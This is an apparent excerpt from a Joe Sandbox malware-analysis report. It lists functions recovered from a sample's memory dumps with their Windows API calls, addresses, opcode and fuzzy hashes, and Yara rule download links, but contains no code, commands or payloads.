                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1c0000_op33779.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0
                                                                                          • Opcode ID: 1ece3eff7ef69611ee126556be6f4899efe61f532828b703a8cdf4cdaaeb4af3
                                                                                          • Instruction ID: 93a6cfb53f12f87f376cc896c8e63fec5fc08efc97f0b7448a9b8c534d0901ed
                                                                                          • Opcode Fuzzy Hash: 1ece3eff7ef69611ee126556be6f4899efe61f532828b703a8cdf4cdaaeb4af3
                                                                                          • Instruction Fuzzy Hash: 8E0112B5D4010DA7DF10DAA5DC42F9DB7B89B54304F0081A6E90997240FB71EB558751
                                                                                          Function 001EBF43 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401576977.00000000001C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1c0000_op33779.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Close
                                                                                          • String ID:
                                                                                          • API String ID: 3535843008-0
                                                                                          • Opcode ID: 798d9c3876bce148b54ee63ea797cdf3a6eb52ae3eb05a8af88ddaea95a2db47
                                                                                          • Instruction ID: 0010ebd2179db16f013db4f2cb3ea02c9206c35564998b0f263eb35364b5bc22
                                                                                          • Opcode Fuzzy Hash: 798d9c3876bce148b54ee63ea797cdf3a6eb52ae3eb05a8af88ddaea95a2db47
                                                                                          • Instruction Fuzzy Hash: B8E08C322406187BC220EB5ADC02F9BB7ADDFC5B10F004059FA08A7241DBB0F9118BF0
                                                                                          Function 00AD07AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                          • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                          • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                          • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                          Function 00ACF9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                          • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                          • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                          • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                          Function 00ACFAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                          • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                          • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                          • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                          Function 00ACFB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                          • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                          • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                          • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                          Function 00ACFDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                          • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                          • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                          • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                          Function 001D538D Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 62threadwindowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(13d6pS3,00000111,00000000,00000000), ref: 001D540A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401576977.00000000001C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1c0000_op33779.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: 'oN$13d6pS3$13d6pS3
                                                                                          • API String ID: 1836367815-4202519509
                                                                                          • Opcode ID: abe8662b7715577a4b67e00549239f0ae9c7219e6112b4b4964fce852ca0655b
                                                                                          • Instruction ID: 2ae781f1fafc3847887a0fd5480a3dcd6c94727b307766434a2e4beb16f42637
                                                                                          • Opcode Fuzzy Hash: abe8662b7715577a4b67e00549239f0ae9c7219e6112b4b4964fce852ca0655b
                                                                                          • Instruction Fuzzy Hash: D001D6B1E0014CBAEB11AAE19C82DEFBB7CDF51794F048165FA14B7241E7748F068BA1
                                                                                          Function 001D5393 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(13d6pS3,00000111,00000000,00000000), ref: 001D540A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401576977.00000000001C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1c0000_op33779.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: 13d6pS3$13d6pS3
                                                                                          • API String ID: 1836367815-3378015834
                                                                                          • Opcode ID: 2a18f07d3b58b25007c1776e027721ed4c3c70ecef04641e0f5be156848a558b
                                                                                          • Instruction ID: c397877dc9a9c3fa741f5684c81957bfe2702d060fd980785bc4719945f3578e
                                                                                          • Opcode Fuzzy Hash: 2a18f07d3b58b25007c1776e027721ed4c3c70ecef04641e0f5be156848a558b
                                                                                          • Instruction Fuzzy Hash: 3401D6B1E0014C7ADB11AAE19C82DEFBB7CDF51794F048065FA1477241E7744F068BA1
                                                                                          Function 001EC1F3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(?,001DF3AB,?,?,00000000,?,001DF3AB,?,?,?), ref: 001EC22E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401576977.00000000001C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1c0000_op33779.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 1cd7afffb4599489c2e922e741e5df127c6c52b9574b0e89c0ec541112c06f1e
                                                                                          • Instruction ID: f9675b38a309a1a6c8ad26e3b42dc151b5e9787f7bad1242f980eb3ffb68d30a
                                                                                          • Opcode Fuzzy Hash: 1cd7afffb4599489c2e922e741e5df127c6c52b9574b0e89c0ec541112c06f1e
                                                                                          • Instruction Fuzzy Hash: 2BE06572204204BBD610EE99DC41E9B77ADEF89710F000019F908A7242CA70B9118BB5
                                                                                          Function 001EC243 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FC5D89F8,00000007,00000000,00000004,00000000,001D85EF,000000F0,?,?,?,?,?), ref: 001EC27E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401576977.00000000001C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1c0000_op33779.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3298025750-0
                                                                                          • Opcode ID: 84c9b89b4cdf1f602563f4f89da99040e5f52e99967f744197380856f61d1e48
                                                                                          • Instruction ID: 0886c6f886e38d927bc7bb91faf6622d917e39f34b0042790d8f8164f53fb7ce
                                                                                          • Opcode Fuzzy Hash: 84c9b89b4cdf1f602563f4f89da99040e5f52e99967f744197380856f61d1e48
                                                                                          • Instruction Fuzzy Hash: 1EE06D752442047BC610EE59DC42F9B73ADEF85710F000419F908A7241CB70B9208AB4
                                                                                          Function 001EC293 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ExitProcess.KERNELBASE(?,00000000,?,?,39D1C69F,?,?,39D1C69F), ref: 001EC2CA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401576977.00000000001C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1c0000_op33779.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExitProcess
                                                                                          • String ID:
                                                                                          • API String ID: 621844428-0
                                                                                          • Opcode ID: 350054d7e724a5522385e81d2f9e3944af108638e355487cb8015eeb31deba3a
                                                                                          • Instruction ID: 130a16eabb443c0d2b55c4015d93a247243c8b2df8301a6b4237e8f9859b9464
                                                                                          • Opcode Fuzzy Hash: 350054d7e724a5522385e81d2f9e3944af108638e355487cb8015eeb31deba3a
                                                                                          • Instruction Fuzzy Hash: B2E046762442147BC620EA6ADC01F9BB7AEDFC5710F004019FA08A7242CBB0BA158BE1

                                                                                          Non-executed Functions

                                                                                          Function 001C1580 Relevance: 3.0, Strings: 2, Instructions: 461COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401576977.00000000001C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1c0000_op33779.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: S u2$ww0f
                                                                                          • API String ID: 0-1271058379
                                                                                          • Opcode ID: c3fca237dcb5863da0e3d119b345813c35514a89970ea866d08ad0f0024c5bb0
                                                                                          • Instruction ID: 30c93c122540fe57fbbd17fa77af91a51517a9addf9993341b25955099e88422
                                                                                          • Opcode Fuzzy Hash: c3fca237dcb5863da0e3d119b345813c35514a89970ea866d08ad0f0024c5bb0
                                                                                          • Instruction Fuzzy Hash: 6AE196725882D2ABC316DB249895BD9BFB1FF37354728529DC0A44F283D722C847CB95
                                                                                          Function 00AC0080 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: [Pj
                                                                                          • API String ID: 0-2289356113
                                                                                          • Opcode ID: d99fce5a2addb6ce0c8294f77de3ca2e118325344b6f01c19f396822cc198201
                                                                                          • Instruction ID: 0603836653241aa08f193b49c615b6416c12d87565456f621820fd5f2a89331b
                                                                                          • Opcode Fuzzy Hash: d99fce5a2addb6ce0c8294f77de3ca2e118325344b6f01c19f396822cc198201
                                                                                          • Instruction Fuzzy Hash: CFF06231204304FBD7119B10CC85F2A7BE5AF45754F16889CF9556A093D762C851D721
                                                                                          Function 00AE26F8 Relevance: .0, Instructions: 44COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                          • Instruction ID: ad21292976bd6e25763ea8a4abd1f379f0352e01c775b9c2569ce1bc8e702c1b
                                                                                          • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                          • Instruction Fuzzy Hash: C7F0C2317241999BDB48EB1A9D5276A33EAEB94300F54C039ED4AC7242E631DD40C391
                                                                                          Function 00B20101 Relevance: .0, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                                                          • Instruction ID: 04a59c8e0bcf5a462a38a0f9a1e99accd5cb468fecc6ed455515e8ee78adf2b3
                                                                                          • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                                                          • Instruction Fuzzy Hash: 12F05E722502149FCB1CDF04D490BB937E2AB80716F2440ACF50F9F692D7359951C755
                                                                                          Function 00AC00EA Relevance: .0, Instructions: 20COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b1d9e5bad135f9067bb3838fbf4d106e6968826a8f713cd16c65eb27e550803d
                                                                                          • Instruction ID: 629f479c45023bb87c375e7fe605930664d3cd093fb2143ef8a210a7790fa6ea
                                                                                          • Opcode Fuzzy Hash: b1d9e5bad135f9067bb3838fbf4d106e6968826a8f713cd16c65eb27e550803d
                                                                                          • Instruction Fuzzy Hash: B3E0E571544A81CFD311DF149901F1AB2E9FB88B10F16497AE40697A51D7689A058A52
                                                                                          Function 00AD00C4 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                          • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                          • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                          • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                          Function 00AD0060 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000C20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ab0000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                          • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                                                          • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                          • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                                                          Function 00AD0078 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.401638574.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.401638574.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
